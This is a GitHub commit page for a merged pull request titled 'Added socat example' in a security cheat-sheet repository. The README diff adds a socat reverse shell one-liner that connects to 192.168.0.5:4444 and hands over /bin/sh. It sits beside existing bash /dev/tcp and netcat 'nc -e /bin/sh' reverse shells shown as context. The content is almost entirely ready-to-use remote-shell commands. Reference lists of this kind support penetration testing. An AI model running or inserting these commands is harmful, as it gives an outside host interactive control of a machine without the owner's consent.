Skip to content

Commit 7b3e5b1

Browse files
author
İsmail Taşdelen
authored
Merge pull request security-cheatsheet#6 from creaktive/master
Added socat example
2 parents 2a8e0e2 + 82511d5 commit 7b3e5b1

File tree

1 file changed

+6
-0
lines changed

1 file changed

+6
-0
lines changed

README.md

Lines changed: 6 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -34,6 +34,12 @@ bash -i >& /dev/tcp/192.168.0.1/8080 0>&1
3434
nc -e /bin/sh 192.168.0.5 4444
3535
```
3636

37+
#### Socat :
38+
39+
```
40+
socat tcp-connect:192.168.0.5:4444 system:/bin/sh
41+
```
42+
3743
#### Perl :
3844

3945
```

0 commit comments

Comments
 (0)